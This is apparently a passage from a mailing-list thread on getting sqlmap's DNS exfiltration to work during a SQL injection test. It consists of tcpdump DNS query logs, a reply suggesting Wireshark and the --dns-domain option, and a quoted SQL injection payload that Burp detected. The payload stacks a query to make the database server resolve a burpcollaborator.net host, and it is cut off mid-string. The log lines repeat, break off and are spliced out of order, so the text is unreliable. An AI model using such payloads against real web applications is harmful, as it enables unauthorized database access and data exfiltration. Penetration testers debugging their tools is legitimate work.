>> 16:58:04.047488 IP 97.87.91.210.56624 > 8.8.8.8.53: 9755+ ?
>> www.testsite.org. (30)
>> 16:58:04.079012 IP 8.8.8.8.53 > 97.87.91.210.56624: 420 1/0/0 A
>> 173.213.231.200 (46)
>> 16:58:04.079921 IP 8.8.8.8.53 > 97.8
7.91.210.56778: 15627 0/1/0 (117)
>> 16:58:04.047464 IP 97.87.91.210.56624 > 8.8.8.8.53: 420+ A?
>> www.testsite.org. (30)
>> 16:58:04.047488 IP 97.87.91.210.56624 > 8.8.8.8.53: 9755+ ?
>> www.testsite.org. (30)
>> 16:58:04.079012 IP 8.8.8.8.53 > 97.87.91.210.56624: 420 1/
.testsite.org>. (30)
16:59:09.104935 IP 8.8.8.8.53 > 97.87.91.210.40911: 52733 1/0/0 A
173.213.231.200 (46)
16:59:09.113262 IP 8.8.8.8.53 > 97.87.91.210.40911: 63191 0/1/0 (117)
1/0/0 A
>> 173.213.231.200 (46)
>> 16:56:59.112534 IP 8.8.8.8.53 > 97.87.91.210.56778: 15627 0/1/0 (117)
>> 16:58:04.047464 IP 97.87.91.210.56624 > 8.8.8.8.53: 420+ A?
>> www.testsite.org. (30)
>> 16:58:04.047488 IP 97.87.91.210.56624 > 8.8.8.8.53: 9755+ AAAA?
16:58:04.079012 IP 8.8.8.8.53 > 97.87.91.210.56624: 420 1/0/0 A
> 173.213.231.200 (46)
> 16:58:04.079921 IP 8.8.8.8.53 > 97.87.91.210.56624: 9755 0/1/0 (117)
> 16:59:09.078601 IP 97.87.91.210.40911 > 8.8.8.8.53: 52733+ A?
> www.testsite.org. (30)
> 16:59:09.078623 IP 97.87
.8.8.8.53 > 97.87.91.210.40911: 52733 1/0/0 A
173.213.231.200 (46)
16:59:09.113262 IP 8.8.8.8.53 > 97.87.91.210.40911: 63191 0/1/0 (117)
It doesn't seem like an injection pattern is being tried that is getting the
DNS exfiltration to occur... or else I'm doing something else wrong.
Thanks,
V
I would suggest you run Wireshark or similar when running with
--dns-domain to properly debug what is going on. There could be really a lot
of problems before you fine-tune it (e.g. another service running on :53).
About "forcing" sqlmap to use dns-exfil: it will always at least try
to t
I have a situation where Burp has detected the following DNS exfiltration
injection for a query parameter in a web app:
GET
//Store/Page.aspx?ProductCategory=45'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'%2b'orator.net\rtf'%3b%20exec%20ma